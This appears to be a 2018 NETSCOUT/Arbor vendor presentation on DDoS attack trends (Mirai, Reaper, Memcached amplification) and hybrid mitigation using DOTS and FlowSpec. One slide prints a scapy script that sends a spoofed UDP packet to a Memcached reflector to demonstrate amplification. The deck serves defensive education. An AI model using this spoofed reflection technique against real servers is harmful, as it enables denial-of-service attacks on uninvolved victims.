COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 1
• Advanced DDoS Trends
• Next Generation DDoS Protection
Agenda
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 2
• Advanced DDoS Trends
• Next Generation DDoS Protection
Agenda
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 3
Security Portfolio
ENTERPRISESERVICE
PROVIDER
©2017 ARBOR® CONFIDENTIAL & PROPRIETARY
Traffic Visibility Arbor SP
DDoS Mitigation Arbor TMS
Cloud Services Arbor CLOUD
DDoS Protection Arbor APS
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 4Network Visibility underpins everything we do at Arbor
THE VALUE OF NETWORK VISIBILITYAmount of Internet traffic monitored by the ATLAS
1/3Internet
Global Network Analysis 140Tbps / 300+ ISP
Honey Pots
INTERNETVISIBILITY
• Internet Health• DDoS Attacks• Threat Tracking
MALWAREDETECTION
• Real-time Behavior• Family Focus
BOTNETMONITORING
• Sinkhole• Infiltration/Activity
Monitoring
Advanced DDoS Attacks
APTCampaign§ Growing frequency and
complexity of DDoS attacks:
• Multi-vector
• Micro Burst
• IoT (inside and out)
§ Growing frequency and complexity of Advanced Persistent Threats increasing
• Phishing
• Ransomware
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 5
IoT Timeline
20172016 2018
DDoS Meets Ransomware
• DDoS discovered in Cerber ransomware• A typical because DDoS Hackers don’t focus on other malware
forms and vice versa• Could only DOS local network• Indicates interest in launching DDoS within the enterprise
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 6
IoT Timeline
20172016 2018
DDoS + IoT = Massive Attacks
• Aug. 540 Gbs Sustsained Attack on Rio Olympics from opening to closing ceremony (Lizardstresser)
• Sep. 20 620 Gbs Attack on KrebsOnSecurity (Mirai)• Sep. 21 990 Gbs Attack on OVH (Mirai)• Oct. 21 Three attacks on Dyn’s Managed DNS (Mirai)
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 7
IoT Timeline
20172016 2018
First Multi-Platform IoT Seeder
• New Mirai Windows seeder targets IoT• Mirai continues to evolve
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 8
IoT Timeline
20172016 2018
Reaper: Default Passwords No More• Based on Mirai• 10-20K IoT bots• Additional 2M IoT devices scanned but not
subsumed• Believed Chinese criminal underground DDoS-for-
hire tool• Exploited OS security flaws not default usernames
& passwords
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 9
IoT Timeline
20172016 2018
Memcached DDoS• Record Breaking
• Combine with IP spoofing , results is a 1.7Tbps attack
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 10
IoT Timeline
20172016 2018
What’s Next?
• Larger more complex more frequent attacks for sure
• DDoS + Ransomware + IOT + Multi-Platform = Internally Launched Attacks
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 11
7,7 MillionDuring this
presentation, approx.
160,000 new IoT devices
will go onlineEstimated 7,7 million (mostly vulnerable) IoT devices are
connected to the Internet EVERY day. (Gartner report Feb. 2017)
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 12
1:500.0001:500.000 is the theoretical DDoS
amplification factor for the Memcached service
Lab test: 1:516.436
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 13
The Memcached DDoS Reflection Attackfrom scapy.all import *
import binascii
# cmd = "get a a a a a a a a a a a a a a a a a a a a a a a … <729 times>"
payload=binascii.unhexlify('0001000000010000676574206120612061206120612061206120612061206120…
pkt=Ether()/IP(src="10.1.138.170",dst="172.17.10.103")/UDP(sport=80,dport=11211)/payload
sendp(pkt, iface="eth1", loop=0,verbose=False)
Attacker sends 1 packet
Reflector sends 536,302 packets =
6.2Gb
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 14
31,4%31,4% of Internet ASN’s allow spoofed traffic to originate
from their networks. (Caida spoofer project)
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 15
1,7 Tbps1.7 Tbps is the size of the largest DDoS attacks in history (Memcached DDoS Reflection attack, February 25th 2018)
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 16
Not Just Amplification/Reflection Attack
Attack Vectors:
◦ SYN-flooding
◦ ACK-flooding
◦ UDP flooding
◦ Valve Source Engine (VSE)
query-flooding
◦ GRE-flooding
◦ Pseudo-random DNS label-prepending attacks (also known as DNS ‘Water Torture’
attacks)
◦ HTTP GET, POST and HEAD attacks
◦ The Mirai Botnet is capable of launching complex multi-vector attacks.
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 17
Application-Layer Attacks
✘✘
• New Tail Attacks delay applications rather than shut them down (LSU & Ga Tech)
• Every 100ms delay equates to a 1% loss in sales (Amazon)
• 1s Delay (Aberdeen Group)• 11% ↓ in page views• 7% ↓ in ecommerce sales
conversions• 16% ↓ in customer satisfaction
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 18
DDoS Attack Trends - FrequencyDDoS Attacks Increasing in Frequency. Fact:
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 19
DDoS Attack Trends - DurationMost DDoS attacks are short in duration.Fact:
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 20
DDoS Attack Trends - SizeMost DDoS attacks are small. (88% less than 2GTbps)Fact:
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report, ATLAS data
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 21
DDoS Attack Trends - ComplexityThe modern day DDoS Attacks is complex; dynamic multi-vector.Fact:
Mirai Botnet isa Modern DayMulti-Vector
Attack
The Internet
BotNet
Your ISP
Firewall
Your Data Center
Volumetric Attacks◦ Large(up to 800 Gbps)◦ Saturates links
TCP State-Exhaustion Attacks◦ Crashes stateful devices (Load balancers,
firewalls, IPSs)
Application Layer Attacks◦ Low and Slow, Stealth attacks◦ Crashes application servers
Legitimate Traffic
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 22
DDoS Attack TrendsThe impact of a DDoS attack can be immediate and severe.Fact:
Penalties:§ Organizations in breach of GDPR can be fined up to (max) 4% of annual global
turnover or €20 Million (whichever is greater).§ It is important to note that these rules apply to both controllers and processors --
meaning 'clouds' will not be exempt from GDPR enforcement.
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 23
To Stop Large Attacks….
Recall: DDoS Attacks exceeding Internet bandwidth:§ 41% of Enterprises§ 61% of Data-center Operators
The Internet
BotNet
Your ISP
Firewall
Your Data Center
DDoS Protection
Attack Traffic
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
Application Servers
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 24
Your only option is the Cloud
The Internet
BotNet
Your ISP Firewall
Your Data Center
DDoS Protection
Cloud-based Mitigation
DDoS Protection
Attack Traffic Clean Traffic
Increase in Demand for Managed DDoS Protection Services
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 25
To Stop the Smaller, Majority of Attacks….
The Internet
BotNet
Your ISP
Firewall
Your Data Center
Attack Traffic
§ Recall:§ Vast majority of DDoS attacks are small (e.g. less than 2 GB)§ And last for short duration of time (e.g. less than 1 hr)§ Yet they still can be multi-vector (e.g. 67%)§ These attacks are difficult for ISP/MSSP to detect.
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 26
You Should Deploy On-Premises Protection
The Internet
BotNet
Your ISP
Firewall
Your Data Center
DDoS Protection
Attack Traffic
§ Put DDoS protection on-premises.§ In front of most critical data centers/applications.§ Customize policies for application running in those datacenters.§ Install in front of firewalls to protect them from TCP-state exhaustion
attacks.
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 27
Stopping The Modern Day DDoS AttackRequires Layered, Automated Protection
4 Backed by continuous threat intelligence.
Your Data Centers/Internal NetworksThe Internet
Your (ISP’s) Network
Volumetric Attack
Application Attack
Scrubbing Center
Automatically stop application layer DDoS attacks on premises. 1
Stop large attacks In-Cloud. 3
Automatic, intelligent communication between on-prem and in-cloud protection to address dynamic attack vectors.
2
DDoS Protection
A Recommended Industry Best Practice:
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 28
Defending Against Insider Threats• These Security Best Practices include:
– Updating the software on all devices on a regular basis.
– Implementing full Network segmentation and harden (or isolate) vulnerable network devices and services.
– Developing a DDoS Attack mitigation process.
– Utilizing flow telemetry to analyze external and internal traffic. This is necessary for attack detection, classification and trace back.
– Deploying a multi-layered DDoS protection.
– Scanning for misconfigured and abusable services, this includes NTP, DNS and SSDP service which can be used for amplification attacks.
– Implementing Anti-Spoofing mechanisms such as Unicast Reverse-Path Forwarding, ACLs, DHCP Snooping & IP Source Guard on all edge devices.
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 29
• Advanced DDoS Trends
• Next Generation DDoS Protection
Agenda
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 30
Hybrid DDoS mitigation
Stop session exhaustion and application layer DDoS attacks
1
CustomerInternet
State&Application
Service Provider
Stop volumetric attacks In-Cloud
3 Intelligent communication between both environments
2
Volume
Scrubbing Center
A Recommended Industry Best Practice:
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 31
Improving Hybrid DDoS mitigation
How to deploy CPE-based protection for the masses? 1
CustomerInternet
State&Application
Scrubbing Center
Service Provider
How to scale to Terabit attacks?
How to make this communication open and widely supported?
Volume
1
3 2
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 32
MSSP view on CPE-based DDoS protectionA growing business, but…
• Shipment of the appliance or installation of the VM
• Rack&Stack, configuration and provisioning
• Maintenance
It does not look like those problems are specific to DDoS mitigation appliances.
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 33
Cloud CPE or Telco Cloud Universal CPE
• DDoS VNF is deployed in the Telco Cloud along with other VNFs
• DDoS VNF runs at the edge of enterprise network on the CPE
DDoS function as a VNF
CustomerInternet
Telco Cloud
Service Provider
Demonstrates Arbor’s market and thought leadership
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 34
DDoS VNF onboarding experiences• Onboarding of DDoS VNF into MANO is easy
– If you don’t have HW dependency (offload of forwarding or filtering to ASIC/NPU/FPGA)
– If you support cloud-init and REST API
• Performance is predictable• Scaling in Cloud CPE mode is easy
– You control the compute resource
• Healing is also easy– … because it is “merciful killing”
• Enabling operators to integrate Arbor’s solutions into orchestrated service delivery platforms
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 35
Improving Hybrid DDoS mitigation
How to deploy CPE-based protection for the masses? 1
CustomerInternet
State&Application
Scrubbing Center
Service Provider
How to scale to Terabit attacks?
How to make this communication open and widely supported?
Volume
1
3 2
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 36
DDoS Open Threat Signaling (DOTS)
The documents are in the final stage:
• The informational documents are matureand will be RFCs soon,
• The protocol documents are stabilizing, and have been used as references forworking implementations:
– 4 implementations exist, one of them is open source
• DOTS protocols may reach RFC status in the calendar year.
From https://datatracker.ietf.org/meeting/93/materials/slides-93-dots-3/
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 37
DOTS: how it works?
DOTS client
Signal channel
DOTS server
Data channel (optional)
Attack VictimMitigator
MitigationRequest
MitigationUpdate
AliasesBW listsFiltersPolicies
In scope of DOTS Out of scope of DOTS
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 38
Improving Hybrid DDoS mitigation
How to deploy CPE-based protection for the masses? 1
CustomerInternet
State&Application
Scrubbing Center
Service Provider
How to scale to Terabit attacks?
How to make this communication open and widely supported?
Volume
1
3 2
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 39
Automation of FlowSpecRate-limit Amplification DDoS
DDoS
MemcachedAmplification
Scrubbing center
Protocol: UDPSRC port: 11211DST IP: victim/32Action: rate-limit to 0
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 40
Automation of FlowSpecOffload blocking of identified bots
DDoS
Scrubbing center
Protocol: UDPDST IP: victim/32Action: redirect to IPUDP to random ports
SRC IP: identified botDST IP: victim/32Action: rate-limit to 0
Non-spoofed TCP attacks
Application layer attacks
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 41
Future of network integration
• Better scalability for FlowSpec support
– More FlowSpec rules supported in Control and Data plane
• More granular redirection rules and rate limiting policies using FlowSpecinterface-set
– draft-ietf-idr-flowspec-interfaceset-03
• Consistent approach to reporting on FlowSpec rules
– A lot of proprietary options available
– Is there a consensus on using netflow with egress_interface == 0 for dropped traffic?
– Will OpenConfig or YANG models be adopted?
• https://tools.ietf.org/html/draft-wu-idr-flowspec-yang-cfg-02
• Tighter integration with network equipment to offload additional blocking rules
COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 42
Thank You.
www.netscout.com
Patrick Lin